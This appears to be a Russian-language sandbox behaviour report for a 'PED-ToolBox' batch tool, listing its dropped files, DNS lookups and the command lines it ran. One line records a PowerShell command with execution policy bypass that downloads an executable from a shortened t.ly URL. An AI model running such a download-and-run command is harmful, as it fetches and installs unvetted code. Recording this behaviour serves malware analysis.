Техническая информация
- https://t.ly/pedmenu как %allusersprofile%\pedtoolbox\peddownload\files\cmdmenusel.exe
- %TEMP%\rarsfx0\ped-toolbox2.bat
- %ALLUSERSPROFILE%\pedtoolbox\ped-toolbox.bat
- nul
- %TEMP%\rarsfx0\ped-toolbox2.bat в %TEMP%\rarsfx0\ped-toolbox.bat
- 't.#y':443
- 't.#y':443
- DNS ASK t.#y
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\RarSFX0\PED-ToolBox2.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c "ren "%TEMP%\RarSFX0\PED-ToolBox2.bat" "PED-ToolBox.bat""
- '%WINDIR%\syswow64\cmd.exe' /c "%TEMP%\RarSFX0\PED-ToolBox.bat"
- '%WINDIR%\syswow64\timeout.exe' 15
- '%WINDIR%\syswow64\cmd.exe' /K "%ALLUSERSPROFILE%\PEDToolBox\PED-ToolBox.bat"
- '%WINDIR%\syswow64\net.exe' FILE
- '%WINDIR%\syswow64\net1.exe' FILE
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\PEDToolBox\PED-ToolBox.bat max
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://t.ly/pedmenu', '%ALLUSERSPROFILE%\PEDToolBox\pedDownload\files\cmdMenuSel.exe');"